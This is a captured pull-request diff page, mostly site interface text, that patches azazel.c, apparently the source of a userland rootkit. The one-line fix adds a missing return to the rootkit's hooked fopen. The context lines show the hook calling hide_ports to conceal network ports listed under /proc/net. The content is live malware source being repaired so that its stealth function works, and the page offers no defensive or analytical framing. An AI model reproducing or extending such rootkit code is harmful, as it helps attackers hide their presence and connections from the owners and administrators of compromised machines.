Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
2 changes: 1 addition & 1 deletion azazel.c
Original file line number Diff line number Diff line change
Expand Up @@ -287,7 +287,7 @@ int access(const char *path, int amode) {
FILE *fopen (const char *filename, const char *mode) {
DEBUG("fopen hooked %s.\n", filename);
if (is_owner())
syscall_list[SYS_FOPEN].syscall_func(filename, mode);
return syscall_list[SYS_FOPEN].syscall_func(filename, mode);

if (is_procnet(filename))
return hide_ports(filename);
Expand Down